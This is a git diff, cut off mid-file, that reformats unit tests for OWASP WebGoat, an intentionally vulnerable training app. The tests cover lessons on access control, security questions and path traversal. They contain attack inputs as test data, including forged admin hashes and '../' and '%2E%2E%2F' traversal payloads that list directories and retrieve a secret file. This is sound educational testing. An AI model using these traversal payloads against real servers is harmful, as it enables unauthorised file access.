diff --git a/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdminTest.java b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdminTest.java
index 074a0b734..58fb063b0 100644
--- a/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdminTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdminTest.java
@@ -1,44 +1,49 @@
 package org.owasp.webgoat.lessons.missingac;
 
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.missingac.DisplayUser;
-import org.owasp.webgoat.lessons.missingac.MissingFunctionAC;
-import org.owasp.webgoat.lessons.missingac.User;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
 import static org.mockito.Mockito.when;
 import static org.owasp.webgoat.lessons.missingac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 class MissingFunctionACYourHashAdminTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new MissingFunctionAC());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new MissingFunctionAC());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    void solve() throws Exception {
-        var userHash = new DisplayUser(new User("Jerry", "doesnotreallymatter", true), PASSWORD_SALT_ADMIN).getUserHash();
-        mockMvc.perform(MockMvcRequestBuilders.post("/access-control/user-hash-fix")
+  @Test
+  void solve() throws Exception {
+    var userHash =
+        new DisplayUser(new User("Jerry", "doesnotreallymatter", true), PASSWORD_SALT_ADMIN)
+            .getUserHash();
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/access-control/user-hash-fix")
                 .param("userHash", userHash))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.containsString("Congrats! You really succeeded when you added the user.")))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.containsString(
+                    "Congrats! You really succeeded when you added the user.")))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    @Test
-    void wrongUserHash() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/access-control/user-hash-fix")
-                .param("userHash", "wrong"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+  @Test
+  void wrongUserHash() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/access-control/user-hash-fix").param("userHash", "wrong"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionYourHashTest.java b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionYourHashTest.java
index 7c01d2c3b..bfb859d53 100644
--- a/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionYourHashTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionYourHashTest.java
@@ -22,40 +22,40 @@
 
 package org.owasp.webgoat.lessons.missingac;
 
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.missingac.MissingFunctionAC;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
 import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 class MissingFunctionYourHashTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new MissingFunctionAC());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new MissingFunctionAC());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    void hashDoesNotMatch() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/access-control/user-hash")
-                .param("userHash", "42"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+  @Test
+  void hashDoesNotMatch() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/access-control/user-hash").param("userHash", "42"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    @Test
-    void hashMatches() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/access-control/user-hash")
+  @Test
+  void hashMatches() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/access-control/user-hash")
                 .param("userHash", "SVtOlaa+ER+w2eoIIVE5/77umvhcsh5V8UyDLUa1Itg="))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignmentTest.java
index 072acc6d7..3111becd0 100644
--- a/src/test/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignmentTest.java
@@ -1,84 +1,112 @@
 package org.owasp.webgoat.lessons.passwordreset;
 
+import static org.mockito.Mockito.when;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.passwordreset.PasswordReset;
 import org.springframework.mock.web.MockHttpSession;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
-import static org.mockito.Mockito.when;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-
 @ExtendWith(SpringExtension.class)
 public class SecurityQuestionAssignmentTest extends LessonTest {
 
-    private MockMvc mockMvc;
+  private MockMvc mockMvc;
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new PasswordReset());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new PasswordReset());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    public void oneQuestionShouldNotSolveTheAssignment() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
+  @Test
+  public void oneQuestionShouldNotSolveTheAssignment() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
                 .param("question", "What is your favorite animal?"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("password-questions-one-successful"))))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)))
-                .andExpect(jsonPath("$.output", CoreMatchers.notNullValue()));
-    }
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(messages.getMessage("password-questions-one-successful"))))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)))
+        .andExpect(jsonPath("$.output", CoreMatchers.notNullValue()));
+  }
 
-    @Test
-    public void twoQuestionsShouldSolveTheAssignment() throws Exception {
-        MockHttpSession mocksession = new MockHttpSession();
-        mockMvc.perform(MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
-                .param("question", "What is your favorite animal?").session(mocksession))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  @Test
+  public void twoQuestionsShouldSolveTheAssignment() throws Exception {
+    MockHttpSession mocksession = new MockHttpSession();
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
+                .param("question", "What is your favorite animal?")
+                .session(mocksession))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
-                .param("question", "In what year was your mother born?").session(mocksession))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))))
-                .andExpect(jsonPath("$.output", CoreMatchers.notNullValue()))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
+                .param("question", "In what year was your mother born?")
+                .session(mocksession))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))))
+        .andExpect(jsonPath("$.output", CoreMatchers.notNullValue()))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    @Test
-    public void answeringSameQuestionTwiceShouldNotSolveAssignment() throws Exception {
-        MockHttpSession mocksession = new MockHttpSession();
-        mockMvc.perform(MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
-                .param("question", "What is your favorite animal?").session(mocksession))
-                .andExpect(status().isOk());
-        mockMvc.perform(MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
-                .param("question", "What is your favorite animal?").session(mocksession))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("password-questions-one-successful"))))
-                .andExpect(jsonPath("$.output", CoreMatchers.notNullValue()))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+  @Test
+  public void answeringSameQuestionTwiceShouldNotSolveAssignment() throws Exception {
+    MockHttpSession mocksession = new MockHttpSession();
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
+                .param("question", "What is your favorite animal?")
+                .session(mocksession))
+        .andExpect(status().isOk());
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
+                .param("question", "What is your favorite animal?")
+                .session(mocksession))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(messages.getMessage("password-questions-one-successful"))))
+        .andExpect(jsonPath("$.output", CoreMatchers.notNullValue()))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    @Test
-    public void solvingForOneUserDoesNotSolveForOtherUser() throws Exception {
-        MockHttpSession mocksession = new MockHttpSession();
-        mockMvc.perform(MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
-                .param("question", "What is your favorite animal?").session(mocksession));
-        mockMvc.perform(MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
-                .param("question", "In what year was your mother born?").session(mocksession))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  @Test
+  public void solvingForOneUserDoesNotSolveForOtherUser() throws Exception {
+    MockHttpSession mocksession = new MockHttpSession();
+    mockMvc.perform(
+        MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
+            .param("question", "What is your favorite animal?")
+            .session(mocksession));
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
+                .param("question", "In what year was your mother born?")
+                .session(mocksession))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
 
-        MockHttpSession mocksession2 = new MockHttpSession();
-        mockMvc.perform(MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
-                .param("question", "What is your favorite animal?").session(mocksession2)).
-                andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+    MockHttpSession mocksession2 = new MockHttpSession();
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/PasswordReset/SecurityQuestions")
+                .param("question", "What is your favorite animal?")
+                .session(mocksession2))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFixTest.java b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFixTest.java
index bce4228f0..6954035f6 100644
--- a/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFixTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFixTest.java
@@ -1,55 +1,59 @@
 package org.owasp.webgoat.lessons.pathtraversal;
 
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.mockito.Mockito;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.pathtraversal.PathTraversal;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.mock.web.MockMultipartFile;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
-import java.io.File;
-
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import java.io.File;
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.mockito.Mockito;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.mock.web.MockMultipartFile;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 public class ProfileUploadFixTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        Mockito.when(webSession.getCurrentLesson()).thenReturn(new PathTraversal());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-        Mockito.when(webSession.getUserName()).thenReturn("unit-test");
-    }
+  @BeforeEach
+  public void setup() {
+    Mockito.when(webSession.getCurrentLesson()).thenReturn(new PathTraversal());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+    Mockito.when(webSession.getUserName()).thenReturn("unit-test");
+  }
 
-    @Test
-    public void solve() throws Exception {
-        var profilePicture = new MockMultipartFile("uploadedFileFix", "../picture.jpg", "text/plain", "an image".getBytes());
+  @Test
+  public void solve() throws Exception {
+    var profilePicture =
+        new MockMultipartFile(
+            "uploadedFileFix", "../picture.jpg", "text/plain", "an image".getBytes());
 
-        mockMvc.perform(MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload-fix")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload-fix")
                 .file(profilePicture)
                 .param("fullNameFix", "..././John Doe"))
-                .andExpect(status().is(200))
-                .andExpect(jsonPath("$.assignment", CoreMatchers.equalTo("ProfileUploadFix")))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+        .andExpect(status().is(200))
+        .andExpect(jsonPath("$.assignment", CoreMatchers.equalTo("ProfileUploadFix")))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    @Test
-    public void normalUpdate() throws Exception {
-        var profilePicture = new MockMultipartFile("uploadedFileFix", "picture.jpg", "text/plain", "an image".getBytes());
+  @Test
+  public void normalUpdate() throws Exception {
+    var profilePicture =
+        new MockMultipartFile(
+            "uploadedFileFix", "picture.jpg", "text/plain", "an image".getBytes());
 
-        mockMvc.perform(MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload-fix")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload-fix")
                 .file(profilePicture)
                 .param("fullNameFix", "John Doe"))
-                .andExpect(status().is(200))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.containsString("unit-test\\"+File.separator+"John Doe")))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
-
-
+        .andExpect(status().is(200))
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.containsString("unit-test\\" + File.separator + "John Doe")))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInputTest.java b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInputTest.java
index ae10174d4..70eff86ed 100644
--- a/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInputTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInputTest.java
@@ -1,54 +1,59 @@
 package org.owasp.webgoat.lessons.pathtraversal;
 
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.mockito.Mockito;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.pathtraversal.PathTraversal;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.mock.web.MockMultipartFile;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
-import java.io.File;
-
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import java.io.File;
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.mockito.Mockito;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.mock.web.MockMultipartFile;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 public class ProfileUploadRemoveUserInputTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() { 
-        Mockito.when(webSession.getCurrentLesson()).thenReturn(new PathTraversal());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-        Mockito.when(webSession.getUserName()).thenReturn("unit-test");
-    }
+  @BeforeEach
+  public void setup() {
+    Mockito.when(webSession.getCurrentLesson()).thenReturn(new PathTraversal());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+    Mockito.when(webSession.getUserName()).thenReturn("unit-test");
+  }
 
-    @Test
-    public void solve() throws Exception {
-        var profilePicture = new MockMultipartFile("uploadedFileRemoveUserInput", "../picture.jpg", "text/plain", "an image".getBytes());
+  @Test
+  public void solve() throws Exception {
+    var profilePicture =
+        new MockMultipartFile(
+            "uploadedFileRemoveUserInput", "../picture.jpg", "text/plain", "an image".getBytes());
 
-        mockMvc.perform(MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload-remove-user-input")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload-remove-user-input")
                 .file(profilePicture)
                 .param("fullNameFix", "John Doe"))
-                .andExpect(status().is(200))
-                .andExpect(jsonPath("$.assignment", CoreMatchers.equalTo("ProfileUploadRemoveUserInput")))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+        .andExpect(status().is(200))
+        .andExpect(jsonPath("$.assignment", CoreMatchers.equalTo("ProfileUploadRemoveUserInput")))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    @Test
-    public void normalUpdate() throws Exception {
-        var profilePicture = new MockMultipartFile("uploadedFileRemoveUserInput", "picture.jpg", "text/plain", "an image".getBytes());
+  @Test
+  public void normalUpdate() throws Exception {
+    var profilePicture =
+        new MockMultipartFile(
+            "uploadedFileRemoveUserInput", "picture.jpg", "text/plain", "an image".getBytes());
 
-        mockMvc.perform(MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload-remove-user-input")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload-remove-user-input")
                 .file(profilePicture)
                 .param("fullNameFix", "John Doe"))
-                .andExpect(status().is(200))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.containsString("unit-test\\"+File.separator+"picture.jpg")))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
-
+        .andExpect(status().is(200))
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.containsString("unit-test\\" + File.separator + "picture.jpg")))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrievalTest.java b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrievalTest.java
index dba1586bc..8772b717d 100644
--- a/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrievalTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrievalTest.java
@@ -1,21 +1,5 @@
 package org.owasp.webgoat.lessons.pathtraversal;
 
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.mockito.Mockito;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.pathtraversal.PathTraversal;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.http.MediaType;
-import org.springframework.security.core.token.Sha512DigestUtils;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.result.MockMvcResultHandlers;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
-import java.io.File;
-import java.net.URI;
-
 import static org.hamcrest.CoreMatchers.equalTo;
 import static org.hamcrest.CoreMatchers.is;
 import static org.hamcrest.Matchers.containsString;
@@ -26,57 +10,75 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import java.io.File;
+import java.net.URI;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.mockito.Mockito;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.http.MediaType;
+import org.springframework.security.core.token.Sha512DigestUtils;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 public class ProfileUploadRetrievalTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        Mockito.when(webSession.getCurrentLesson()).thenReturn(new PathTraversal());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-        Mockito.when(webSession.getUserName()).thenReturn("unit-test");
-    }
+  @BeforeEach
+  public void setup() {
+    Mockito.when(webSession.getCurrentLesson()).thenReturn(new PathTraversal());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+    Mockito.when(webSession.getUserName()).thenReturn("unit-test");
+  }
 
-    @Test
-    public void solve() throws Exception {
-        //Look at the response
-        mockMvc.perform(get("/PathTraversal/random-picture"))
-                .andExpect(status().is(200))
-                .andExpect(header().exists("Location"))
-                .andExpect(header().string("Location", containsString("?id=")))
-                .andExpect(content().contentTypeCompatibleWith(MediaType.IMAGE_JPEG));
+  @Test
+  public void solve() throws Exception {
+    // Look at the response
+    mockMvc
+        .perform(get("/PathTraversal/random-picture"))
+        .andExpect(status().is(200))
+        .andExpect(header().exists("Location"))
+        .andExpect(header().string("Location", containsString("?id=")))
+        .andExpect(content().contentTypeCompatibleWith(MediaType.IMAGE_JPEG));
 
-        //Browse the directories
-        var uri = new URI("/PathTraversal/random-picture?id=%2E%2E%2F%2E%2E%2F");
-        mockMvc.perform(get(uri))
-                .andExpect(status().is(404))
-                //.andDo(MockMvcResultHandlers.print())
-                .andExpect(content().string(containsString("path-traversal-secret.jpg")));
+    // Browse the directories
+    var uri = new URI("/PathTraversal/random-picture?id=%2E%2E%2F%2E%2E%2F");
+    mockMvc
+        .perform(get(uri))
+        .andExpect(status().is(404))
+        // .andDo(MockMvcResultHandlers.print())
+        .andExpect(content().string(containsString("path-traversal-secret.jpg")));
 
-        //Retrieve the secret file (note: .jpg is added by the server)
-        uri = new URI("/PathTraversal/random-picture?id=%2E%2E%2F%2E%2E%2Fpath-traversal-secret");
-        mockMvc.perform(get(uri))
-                .andExpect(status().is(200))
-                .andExpect(content().string("You found it submit the SHA-512 hash of your username as answer"))
-                .andExpect(content().contentTypeCompatibleWith(MediaType.IMAGE_JPEG));
+    // Retrieve the secret file (note: .jpg is added by the server)
+    uri = new URI("/PathTraversal/random-picture?id=%2E%2E%2F%2E%2E%2Fpath-traversal-secret");
+    mockMvc
+        .perform(get(uri))
+        .andExpect(status().is(200))
+        .andExpect(
+            content().string("You found it submit the SHA-512 hash of your username as answer"))
+        .andExpect(content().contentTypeCompatibleWith(MediaType.IMAGE_JPEG));
 
-        //Post flag
-        mockMvc.perform(post("/PathTraversal/random").param("secret", Sha512DigestUtils.shaHex("unit-test")))
-                .andExpect(status().is(200))
-                .andExpect(jsonPath("$.assignment", equalTo("ProfileUploadRetrieval")))
-                .andExpect(jsonPath("$.lessonCompleted", is(true)));
-    }
+    // Post flag
+    mockMvc
+        .perform(
+            post("/PathTraversal/random").param("secret", Sha512DigestUtils.shaHex("unit-test")))
+        .andExpect(status().is(200))
+        .andExpect(jsonPath("$.assignment", equalTo("ProfileUploadRetrieval")))
+        .andExpect(jsonPath("$.lessonCompleted", is(true)));
+  }
 
-    @Test
-    public void shouldReceiveRandomPicture() throws Exception {
-        mockMvc.perform(get("/PathTraversal/random-picture"))
-                .andExpect(status().is(200))
-                .andExpect(header().exists("Location"))
-                .andExpect(content().contentTypeCompatibleWith(MediaType.IMAGE_JPEG));
-    }
+  @Test
+  public void shouldReceiveRandomPicture() throws Exception {
+    mockMvc
+        .perform(get("/PathTraversal/random-picture"))
+        .andExpect(status().is(200))
+        .andExpect(header().exists("Location"))
+        .andExpect(content().contentTypeCompatibleWith(MediaType.IMAGE_JPEG));
+  }
 
-    @Test
-    public void unknownFileShouldGiveDirectoryContents() throws Exception {
-        mockMvc.perform(get("/PathTraversal/random-picture?id=test"))
-                .andExpect(status().is(404))
-                .andExpect(content().string(containsString("cats" + File.separator + "8.jpg")));
-    }
+  @Test
+  public void unknownFileShouldGiveDirectoryContents() throws Exception {
+    mockMvc
+        .perform(get("/PathTraversal/random-picture?id=test"))
+        .andExpect(status().is(404))
+        .andExpect(content().string(containsString("cats" + File.separator + "8.jpg")));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadTest.java b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadTest.java
index a3932cc83..c44379e65 100644
--- a/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadTest.java
@@ -1,79 +1,98 @@
 package org.owasp.webgoat.lessons.pathtraversal;
 
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.mockito.Mockito;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.pathtraversal.PathTraversal;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.mock.web.MockMultipartFile;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
